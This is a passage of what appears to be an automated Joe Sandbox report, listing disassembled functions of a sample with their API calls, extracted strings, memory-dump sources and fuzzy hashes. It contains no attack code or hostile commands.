                                                                                                              • Part of subcall function 01106A1E: __NMSG_WRITE.LIBCMT ref: 01106A3C
                                                                                                              • Part of subcall function 01106A1E: HeapAlloc.KERNEL32(01CB0000,00000000,00000001,00000000,00000000,00000000,?,01112230,00000000,00000000,00000000,00000000,?,01110B70,00000018,01590338), ref: 01106A61
                                                                                                            • _memmove.LIBCMT ref: 00F8128F
                                                                                                            • _free.LIBCMT ref: 00F812A5
                                                                                                            • _memmove.LIBCMT ref: 00F812F6
                                                                                                            • _memmove.LIBCMT ref: 00F8130A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _memmove$AllocHeap_free_malloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 3595929300-0
                                                                                                            • Opcode ID: 2f3df4c069ad6b5682e4c8b75c9412815c5c9b19b1d24556b0c882ce300e9cb3
                                                                                                            • Instruction ID: f980017f10f35ae4318eebc370333756553bfc0ff8d581a799e20089afa7e9a4
                                                                                                            • Opcode Fuzzy Hash: 2f3df4c069ad6b5682e4c8b75c9412815c5c9b19b1d24556b0c882ce300e9cb3
                                                                                                            • Instruction Fuzzy Hash: 8C316472B001169FD714EE58DC81E6AF3ADFF903647088279E904CB351EB24E95987A1
                                                                                                            APIs
                                                                                                            • _malloc.LIBCMT ref: 01107320
                                                                                                              • Part of subcall function 01106A1E: __FF_MSGBANNER.LIBCMT ref: 01106A35
                                                                                                              • Part of subcall function 01106A1E: __NMSG_WRITE.LIBCMT ref: 01106A3C
                                                                                                              • Part of subcall function 01106A1E: HeapAlloc.KERNEL32(01CB0000,00000000,00000001,00000000,00000000,00000000,?,01112230,00000000,00000000,00000000,00000000,?,01110B70,00000018,01590338), ref: 01106A61
                                                                                                            • _free.LIBCMT ref: 01107333
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocHeap_free_malloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 2734353464-0
                                                                                                            • Opcode ID: 82a491e23955095e7ac2205eda7d10ca96317b010aafaeb0bdde423e5ea68a65
                                                                                                            • Instruction ID: a4508be69b782072b324545aef80d32a71303d700a47a23b5e1ccec87f50608a
                                                                                                            • Opcode Fuzzy Hash: 82a491e23955095e7ac2205eda7d10ca96317b010aafaeb0bdde423e5ea68a65
                                                                                                            • Instruction Fuzzy Hash: 7011E332D08213AFEB3F3FB8A80565A3B99AB14268F114125FD899E1C0DBB0A851C790
                                                                                                            APIs
                                                                                                            • _malloc.LIBCMT ref: 011037B6
                                                                                                              • Part of subcall function 01106A1E: __FF_MSGBANNER.LIBCMT ref: 01106A35
                                                                                                              • Part of subcall function 01106A1E: __NMSG_WRITE.LIBCMT ref: 01106A3C
                                                                                                              • Part of subcall function 01106A1E: HeapAlloc.KERNEL32(01CB0000,00000000,00000001,00000000,00000000,00000000,?,01112230,00000000,00000000,00000000,00000000,?,01110B70,00000018,01590338), ref: 01106A61
                                                                                                            • std::exception::exception.LIBCMT ref: 011037D4
                                                                                                            • __CxxThrowException@8.LIBCMT ref: 011037E9
                                                                                                              • Part of subcall function 011041A5: RaiseException.KERNEL32(?,?,00000001,01579490,?,?,?,?,?,00F70BE2,00000001,01579490), ref: 011041FA
                                                                                                            • __calloc_crt.LIBCMT ref: 011037F4
                                                                                                              • Part of subcall function 011121D2: __calloc_impl.LIBCMT ref: 011121E1
                                                                                                            • EncodePointer.KERNEL32(00000000,?,?,01579490,?,00000001), ref: 011037FE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocEncodeExceptionException@8HeapPointerRaiseThrow__calloc_crt__calloc_impl_mallocstd::exception::exception
                                                                                                            • String ID:
                                                                                                            • API String ID: 992646963-0
                                                                                                            • Opcode ID: 9d231241923232ac7d67924c190e03e1dc878d166a304bb831d42293c8baed60
                                                                                                            • Instruction ID: e642a8b6d045194c288d72e1bb8eb3ed86f704cd99f5e81da51eeeef24af4955
                                                                                                            • Opcode Fuzzy Hash: 9d231241923232ac7d67924c190e03e1dc878d166a304bb831d42293c8baed60
                                                                                                            • Instruction Fuzzy Hash: 2601FC75D1470AAFEB2AEB64FC05AED7BA8BB00728F104066ED149A1C1EB7045458791
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _memmove
                                                                                                            • String ID: invalid string position$string too long
                                                                                                            • API String ID: 4104443479-4289949731
                                                                                                            • Opcode ID: 143aa6126dd648cf2c5e27c25d074fed59356b60b3f5c16c4ca9615cc4a83124
                                                                                                            • Instruction ID: ae88f6b04da786f6bb9192bfaf2b8f60dace4e29df1ff9a2a4c97d7aecad9dd0
                                                                                                            • Opcode Fuzzy Hash: 143aa6126dd648cf2c5e27c25d074fed59356b60b3f5c16c4ca9615cc4a83124
                                                                                                            • Instruction Fuzzy Hash: 544125323003119BDB349E2C9C84A2BF7A5EB90794B10492EF699C7681D7B5EE44DBA1
                                                                                                            APIs
                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00000001,00000000,00000000), ref: 00CB54A6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateEvent
                                                                                                            • String ID: 1_q_onNewConnection()$2activated(HANDLE)$\\.\pipe\
                                                                                                            • API String ID: 2692171526-3002912998
                                                                                                            • Opcode ID: 6beb00ad20cf56e3eaaebf8e3eb75c22e580c21c3b999b45251ad7b0b7461f81
                                                                                                            • Instruction ID: 17986b9b4cd6d376331d862238940feaaa366994ed81f202543a6b11b175cce7
                                                                                                            • Opcode Fuzzy Hash: 6beb00ad20cf56e3eaaebf8e3eb75c22e580c21c3b999b45251ad7b0b7461f81
                                                                                                            • Instruction Fuzzy Hash: 0E312971600701AFEA28DF24DC42BAA7398BF81325F04051DF52A9B2D1DB61AD498B92
                                                                                                            APIs
                                                                                                            • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000410,00000000,00000000,?,?), ref: 00FF7C99
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00FF7CAC
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00FF7CB6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$CreateProcess
                                                                                                            • String ID: D
                                                                                                            • API String ID: 2922976086-2746444292
                                                                                                            • Opcode ID: 50d17951ba856a531878ab14bb1a5a2d9816a7754e0371f4f5b2144402d86c23
                                                                                                            • Instruction ID: b846d47cef5f7692d0031e8c89cc72e3fb886ce050729b4d42d74b53d43af4b1
                                                                                                            • Opcode Fuzzy Hash: 50d17951ba856a531878ab14bb1a5a2d9816a7754e0371f4f5b2144402d86c23
                                                                                                            • Instruction Fuzzy Hash: D9418DB1548341AFE714DF20C855B2BBBE4FF85724F204A1CF6A58B2A0D77AD844DB52
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • Lighthouse plugin does not support threaded pixmaps!, xrefs: 00DB2A0F
                                                                                                            • QPixmap: It is not safe to use pixmaps outside the GUI thread, xrefs: 00DB2A25
                                                                                                            • QPixmap: Must construct a QGuiApplication before a QPixmap, xrefs: 00DB29C8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wprintf
                                                                                                            • String ID: Lighthouse plugin does not support threaded pixmaps!$QPixmap: It is not safe to use pixmaps outside the GUI thread$QPixmap: Must construct a QGuiApplication before a QPixmap
                                                                                                            • API String ID: 2738768116-1007097467
                                                                                                            • Opcode ID: ae1d93e85a47bbd31390ecaad09f7fb120bc39f8a5a5a11ed38b2770494631d2
                                                                                                            • Instruction ID: 06e0606c43e2adfeba12c6068bd36f24b9718f715caebea268c35d0885ac960b
                                                                                                            • Opcode Fuzzy Hash: ae1d93e85a47bbd31390ecaad09f7fb120bc39f8a5a5a11ed38b2770494631d2
                                                                                                            • Instruction Fuzzy Hash: CF012D71C007025ACA25FB2CDC429AA7390AB85B08F848058F8D557212F77ED74C97A3
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free_malloc_memmove_strrchr
                                                                                                            • String ID:
                                                                                                            • API String ID: 1341997900-0
                                                                                                            • Opcode ID: e6569bc10b768b95b49452636c83029c79fb00c61175ad3bf805d295cf702975
                                                                                                            • Instruction ID: 0451e02823d6c721cc42c17b421af75e00c3f950022720bd6283fba76669fb1f
                                                                                                            • Opcode Fuzzy Hash: e6569bc10b768b95b49452636c83029c79fb00c61175ad3bf805d295cf702975
                                                                                                            • Instruction Fuzzy Hash: 8C410371A043128BC705EF29CA42F6BBBE8AF94754F04856DF98167302DB34EE0597D2
                                                                                                            APIs
                                                                                                            • CoCreateInstance.OLE32 ref: 01089BB9
                                                                                                            • CoInitialize.OLE32(00000000), ref: 01089BC6
                                                                                                            • CoCreateInstance.OLE32(01514B24,00000000,00000001,01514A94,?), ref: 01089BDF
                                                                                                            • CoUninitialize.OLE32 ref: 01089CD2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateInstance$InitializeUninitialize
                                                                                                            • String ID:
                                                                                                            • API String ID: 1701838895-0
                                                                                                            • Opcode ID: beeec4886f9921596c99e0a1c1a112a15867aa511d9b3d25c6db825242c9c3c2
                                                                                                            • Instruction ID: f9214b2f9d07b31b4d3e76df505b2acd5dbce16b0173fa3bbe0004a95943ae7c
                                                                                                            • Opcode Fuzzy Hash: beeec4886f9921596c99e0a1c1a112a15867aa511d9b3d25c6db825242c9c3c2
                                                                                                            • Instruction Fuzzy Hash: 9A51A3B12483029FD724EF24C845F6BBBE8FF85718F10492CF6999B290D775A809CB52
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.3235543481.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.3235479456.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.0000000001336000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000013A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236201681.00000000014A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236525954.00000000015A2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236544491.00000000015AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236562405.00000000015AE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015BD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236582000.00000000015D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.3236657461.00000000015DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_770000_BDxsBr8Dce.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                            • String ID:
                                                                                                            • API String ID: 2782032738-0
                                                                                                            • Opcode ID: 0d3fce7a90de8dce4001100d3dee71be0e39f4ae9c571ee0f59f0201202d75f8
                                                                                                            • Instruction ID: 1f1e5cdabd2c5ddf1600c3256d7156addee9324c6148b2db4002763fe2fc4881
                                                                                                            • Opcode Fuzzy Hash: 0d3fce7a90de8dce4001100d3dee71be0e39f4ae9c571ee0f59f0201202d75f8
                                                                                                            • Instruction Fuzzy Hash: 7A41A331F007069BDB5E8EADC8805AE7BA7AF45264B14863EE955872C0F7F09A808F50
                                                                                                            APIs
                                                                                                            • _malloc.LIBCMT ref: 00F84C45
                                                                                                              • Part of subcall function 01106A1E: __FF_MSGBANNER.LIBCMT ref: 01106A35
                                                                                                              • Part of subcall function 01106A1E: __NMSG_WRITE.LIBCMT ref: 01106A3C
